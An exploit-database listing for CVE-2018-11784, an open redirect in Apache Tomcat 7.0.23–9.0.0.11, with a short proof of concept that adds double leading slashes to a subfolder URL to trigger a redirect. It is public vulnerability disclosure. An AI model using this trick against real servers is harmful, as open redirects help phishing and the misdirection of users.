Exploit for Apache Tomcat 9.0.0M1 Open Redirect CVE-2018-11784

Name: Exploit for Apache Tomcat 9.0.0M1 Open Redirect CVE-2018-11784
Rating: 5 (366 reviews)

2021-07-11 | CVSS 4.3

## https://sploitus.com/exploit?id=PACKETSTORM:163456
# Exploit Title: Apache Tomcat 9.0.0.M1 - Open Redirect  
# Date: 10/04/2018  
# Exploit Author: Central InfoSec  
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.11, 8.5.0 to 8.5.33, and 7.0.23 to 7.0.90  
# CVE : CVE-2018-11784  
  
# Proof of Concept:  
  
# Identify a subfolder within your application  
http://example.com/test/  
  
# Modify the URL to include at least 2 leading slashes before the subfolder and no trailing slash  
http://example.com//test  
  
# Browse to the newly created URL and the application will perform a redirection  
http://test/